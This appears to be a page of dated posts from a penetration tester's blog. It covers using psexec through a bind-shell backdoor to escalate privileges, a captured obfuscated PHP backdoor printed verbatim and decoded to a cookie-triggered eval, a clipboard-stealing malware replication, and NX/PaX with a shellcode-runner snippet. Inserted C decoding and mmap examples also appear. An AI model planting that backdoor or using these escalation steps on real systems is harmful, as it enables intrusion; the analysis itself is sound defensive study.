Friday, January 31, 2014

Leveraging psexec locally to execute privileged commands

Gong Xi Fa Choy to all of you. Not really a good start to the year for me, my daughter is sick. But I need to go to Jakarta next week to teach a Digital Forensics/Anti-Forensics class. Okay, anyway, this is another trick to use Sysinternals tools in a hackish way.

Case Study

  1. In a social engineering campaign, you managed to pivot your way into a Windows machine with low-privileged (guest) access.
  2. You have an admin-privileged username and password, but RDP is impossible or runas doesn't work.
  3. Ingress/egress firewall kicked in, so psexec remotely is impossible.
  4. For Fun!!!!!
Suppose we backdoored a normal user with a bind shell on port 4444.



As you can see, adding a user is kinda impossible due to limited privilege. Let's assume we know the password of the user admin, which is admin123. Can we use the runas command?


It seems our runas command failed because our bind shell backdoor is an interactive shell that can't provide a normal stdin (runas reads the password from the console, not from a pipe).

All hope is lost? Nope, we can use psexec to bypass these circumstances. I would say "psexec is like sudo".


Why do I like psexec? I believe Sysinternals tools are the "universal Windows backdoor."




Thursday, January 2, 2014

2014: The Age of Pentest Apocalypse.

Happy new year everyone.

We are entering 2014. After doing pentests for so many years... I can safely say "Penetration Testing is Dead". I am not the first person to make such a statement. Popping a remote shell and rooting has been quite challenging for the last 2 years (challenging but not impossible).

Summary of the year 2013.

1. Secure frameworks are being deployed widely.
2. IPS/IDS being deployed widely (Juniper/Bluecoat/bla x3).
3. HIPS becoming quite common (application whitelisting).
4. SQL injection/XSS/remote code exec still exist, but are no longer straightforward: it's quite rare to see ' or 1=1 #, but sometimes ' or RAND() > 0.5 still works; wide usage of WAFs.
5. VA is deadly inaccurate... (it might cover most, but not all).
6. Local clients are willing to sign up for a more offensive security testing approach (brute-force attacks, sniffing, etc. x3).
7. Weak/default credentials seem to be the weakest link of all time.

Mandatory skills required in this age.

1. The art of tunneling and pivoting... it's mandatory to get around firewalls.
2. Bypassing antivirus/IDS/IPS... need I say more? Implementing your own VM...
3. Bypassing HIPS: executing unlisted/blacklisted binaries outside the whitelisted domain (usually Windows).
4. Bypassing noexec... knowledge of ld-based rootkits might help (usually *nix).
5. Forensics and anti-forensics techniques.
6. Modifying PoC exploits to suit your needs... MS08-067 is just not there anymore, lolz.

Expect to see more revolution in 2014 pentesting!!!



P/S: If someone comes around and **shitting you about great tools, tell 'em pentest is dead.


Tuesday, November 19, 2013

Iloveyou PHP Backdoor

One of my botnets, eh, honeynets managed to catch this nifty PHP script.

$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>

It's pretty much straightforward just by glancing at it.

$kisg is actually str_replace
$gsqn is base64_decode
$zuzt is create_function

Cleaning up this badware stuff will give us:

$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));

Final Output:

$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})
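The unwrapping above, carried out in C as an added example that is not the post's or the backdoor's own code: the same str_replace filler trick and the base64 layer, applied to the four chunks captured above, so the payload can be read without handing it to a PHP interpreter. The function names (`strip_filler`, `b64_decode`, `decode_payload`, `looks_like_cookie_eval_backdoor`) are mine; the chunk strings are verbatim from the script above.

```c
/* Added example, not the post's or the backdoor's code: peel the two
 * layers the post walks through, the filler-substring str_replace trick
 * and the base64 layer, in plain C. Input strings are the ones captured
 * above; no PHP is executed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Equivalent of PHP str_replace($filler, "", $s): drop every left-to-right,
 * non-overlapping occurrence of filler. Caller frees the result. */
char *strip_filler(const char *s, const char *filler)
{
    size_t fl = strlen(filler);
    char *out = malloc(strlen(s) + 1), *o = out;
    if (!out)
        return NULL;
    while (*s) {
        if (fl && strncmp(s, filler, fl) == 0)
            s += fl;               /* skip the filler, emit nothing */
        else
            *o++ = *s++;
    }
    *o = '\0';
    return out;
}

/* Minimal base64 decoder. Like PHP's base64_decode it tolerates missing '='
 * padding and skips characters outside the alphabet. The output is
 * NUL-terminated for printing; *outlen receives the raw byte count. */
char *b64_decode(const char *in, size_t *outlen)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    char *out = malloc(strlen(in) + 1), *o = out;
    unsigned bits = 0;
    int nbits = 0;
    if (!out)
        return NULL;
    for (; *in && *in != '='; in++) {
        const char *p = strchr(tbl, *in);
        if (!p)
            continue;              /* whitespace or junk: ignore */
        bits = (bits << 6) | (unsigned)(p - tbl);
        nbits += 6;
        if (nbits >= 8) {
            nbits -= 8;
            *o++ = (char)((bits >> nbits) & 0xff);
        }
    }
    *o = '\0';
    if (outlen)
        *outlen = (size_t)(o - out);
    return out;
}

/* Rebuild the payload the way the script does: concatenate the four chunks,
 * strip the "of" filler, then base64-decode. Returns the plaintext PHP that
 * the post shows as "Final Output"; caller frees. */
char *decode_payload(void)
{
    /* the four chunks, verbatim from the captured script */
    const char *dkhg = "JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
    const char *sdfv = "oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
    const char *ltjz = "yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
    const char *ynsx = "CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
    size_t n = strlen(dkhg) + strlen(sdfv) + strlen(ltjz) + strlen(ynsx) + 1;
    char *joined = malloc(n);
    if (!joined)
        return NULL;
    snprintf(joined, n, "%s%s%s%s", dkhg, sdfv, ltjz, ynsx);
    char *clean = strip_filler(joined, "of");
    char *plain = clean ? b64_decode(clean, NULL) : NULL;
    free(joined);
    free(clean);
    return plain;
}

/* Quick triage check on the decoded text: does it carry the tell-tale
 * eval(base64_decode(...)) over cookie data that the post describes? */
int looks_like_cookie_eval_backdoor(const char *php)
{
    return strstr(php, "$_COOKIE") != NULL
        && strstr(php, "eval(base64_decode(") != NULL;
}

int main(void)
{
    char *name;
    name = strip_filler("sartarrar_rarearparlaracare", "ar");
    printf("$kisg = %s\n", name); free(name);
    name = strip_filler("bdkadksdkedk64dk_dkddkecdkode", "dk");
    printf("$gsqn = %s\n", name); free(name);
    name = strip_filler("zczrzezatze_zfzuznzcztzion", "z");
    printf("$zuzt = %s\n", name); free(name);
    char *payload = decode_payload();
    printf("payload:\n%s\nbackdoor? %d\n", payload,
           looks_like_cookie_eval_backdoor(payload));
    free(payload);
    return 0;
}
```

Compile with `gcc decode.c -o decode && ./decode`. The point of doing the decode in C (or any non-PHP tool) is that the last layer is `eval`, so running the sample itself to "see what it does" is exactly what the author wants; a static decoder gives you the `$_COOKIE`-triggered `eval(base64_decode(...))` in plain text, which is the string a WAF rule or a file-integrity scan should be looking for.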


Conclusion? The author of this backdoor must be a romantic...



Friday, October 25, 2013

Replicating Malware Function For Fun and Profits!!!!

At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max without any useless restraining policy...
If you read this post and watch the video below:


You know it's fun.
Basically it's using VBS scripting to copy the clipboard...

I've replicated a similar technique using VBS scripting and a bat script as a PoC.
It's a very innovative attack for phishing...

Source code is in the video.
This is just a PoC; there's a way to bypass the latest IE clipboard security warning!!!



Sunday, October 13, 2013

A simple explanation of how NX/PaX works.

This is nothing more than a recap of how NX/PaX works and why it's important to understand for beginners in exploitation, writing CTF flags :p, and other interesting people's papers.

Below is the simplest code, a bad example of how to execute shellcode.

unsigned char code[] = "\xcc";          /* one-byte "shellcode": int3 (breakpoint) */
int main(int argc, char **argv)
{
  int (*func)();                        /* a function pointer */
  func = (int (*)()) code;              /* point it at the bytes in code[] */
  (*func)();                            /* jump into code[] and run whatever is there */
  return 0;
}


Explanation:
1. We declare a function pointer called func.
2. func is pointed at the memory location of code.
3. Execute whatever func points to, which is to say whatever code resides in code.
Try to compile and run:
gcc example1.c -o example ; ./example
Segmentation fault
Why? To understand this problem: modern compilers by default will enforce the NX bit on the stack region of the process. Any "local variable" that we declare will be loaded in the stack region of memory. And what does it mean to us? To generalize our understanding, we know a region of memory in a computer can have 3 properties:
1. Read: we can read the memory.
2. Write: we can write data to that region.
3. Execute: the code in that region can be executed.
cat /proc/3976/maps 
08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0 
b7fdf000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
As you can see, right now the stack region is marked as read-write... no x means that code in that region can't be executed.
Now that we understand the stack region is protected, attackers evolve their attack into ROP or ret2/whateverlib style programming. But that's beyond the scope of this post. Having said that, it's still possible to get your code executed by using the mmap trick. To make everyone happy, here I cheat a little using execstack just to see the difference:
gcc example1.c -o example ; execstack -s example; ./example 
Trace/breakpoint trap
cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203    /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203    /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0 
b7fdf000-b7fe1000 rwxp 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]
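As an added example (not code from the original post), here is the mmap trick the post mentions, done the W^X way, next to a small parser for the /proc/<pid>/maps format dumped above. It assumes Linux with gcc or clang on x86 or arm64; a `return 42` stub stands in for the post's `\xcc` so the result is something we can check rather than a SIGTRAP. The function, constant and sample names (`run_stub_from_mmap`, `region_has_exec`, `global_array_is_exec`, `SAMPLE_MAPS`, `code_in_data`) are mine, and `SAMPLE_MAPS` is three lines copied from the first maps dump above.

```c
/* Added example, not code from the original post: the "mmap trick" the post
 * mentions, done the W^X way, plus a tiny parser for /proc/<pid>/maps lines
 * like the ones dumped above. Assumes Linux (mmap/mprotect and /proc) and
 * gcc or clang on x86 or arm64. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

/* Machine code for "return 42". The post's "\xcc" is int3, which only raises
 * SIGTRAP, so a stub whose return value we can check is easier to observe. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 }; /* mov eax,42 ; ret */
#elif defined(__aarch64__)
static const unsigned char stub[] = { 0x40, 0x05, 0x80, 0x52,               /* mov w0,#42 */
                                      0xc0, 0x03, 0x5f, 0xd6 };             /* ret        */
#else
#error "add a return-42 stub for this architecture"
#endif

/* The same bytes as a writable global, just like code[] in the post. This lands
 * in a rw-p mapping, which is why calling into it faults under NX; we only use
 * its address to look the mapping up, never call it. */
unsigned char code_in_data[sizeof stub];

/* Three lines taken from the first maps dump above (constructed test input). */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example\n"
    "08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\n";

/* Walk a maps dump and report whether the mapping containing addr carries the
 * 'x' bit: 1 = executable, 0 = not, -1 = no mapping covers addr. */
int region_has_exec(const char *maps, uintptr_t addr)
{
    for (const char *line = maps; line && *line; ) {
        unsigned long lo, hi;
        char perms[8];
        if (sscanf(line, "%lx-%lx %7s", &lo, &hi, perms) == 3
            && addr >= lo && addr < hi)
            return perms[2] == 'x';
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return -1;
}

/* The mmap trick with W^X: the page is writable while the stub is copied in,
 * then flipped to read+execute before it is called, so the same page is never
 * writable and executable at once. Returns the stub's result (42), or -1 if
 * the kernel refuses either step. */
int run_stub_from_mmap(void)
{
    const size_t len = 4096;
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    memcpy(page, stub, sizeof stub);
    if (mprotect(page, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, len);
        return -1;
    }
    /* arm64 has separate I/D caches; this is a no-op on x86 */
    __builtin___clear_cache((char *)page, (char *)page + len);
    int (*fn)(void);
    memcpy(&fn, &page, sizeof fn);   /* object-to-function pointer without a cast warning */
    int r = fn();
    munmap(page, len);
    return r;
}

/* Look our own global up in /proc/self/maps. On a stock NX build this is 0;
 * it becomes 1 only after something like the execstack -s run above. */
int global_array_is_exec(void)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return region_has_exec(buf, (uintptr_t)code_in_data);
}

int main(void)
{
    memcpy(code_in_data, stub, sizeof stub);
    printf("stub via mmap+mprotect returned %d\n", run_stub_from_mmap());
    printf("global array executable?        %d\n", global_array_is_exec());
    printf("sample [stack] line executable? %d\n",
           region_has_exec(SAMPLE_MAPS, 0xbfffff00));
    return 0;
}
```

Compile with `gcc example2.c -o example2 && ./example2`. The mmap'd page returns 42 while the identical bytes in `code_in_data` stay in a rw-p mapping, which is the difference between the two maps dumps above without touching execstack. The RW-then-RX sequence is what JIT engines do; under a PaX kernel with MPROTECT enabled even that transition is refused, and `run_stub_from_mmap` then returns -1 instead of crashing, which is the failure you want to see rather than a silent rwx page.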


Oh, HITB 2013 KUL starts tomorrow... See you there soon!

Monday, September 16, 2013

Bat script: setting up your notebook as a wireless AP

Captive portal/Layer 2 isolation is a no-no for Chromecast. So I'm in Kelate right now; here's a quick bat script for setting up your Windows 7 as an AP. Run as administrator, of course.


ap.bat

@ECHO OFF
REM allow the hosted network (virtual Wi-Fi AP) on the wireless adapter
netsh wlan set hostednetwork mode=allow
REM put your own SSID and WPA2 key here; keyUsage=persistent keeps the key across reboots
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
REM bring the AP up
netsh wlan start hostednetwork


Use ICS with your No4G, or whatever... More info:

http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx



Friday, September 13, 2013

Chromecast Experience in .MY Part 3

Okay, part 3... It's pretty short and simple. They say when you manage to produce a UML, the program is already complete :p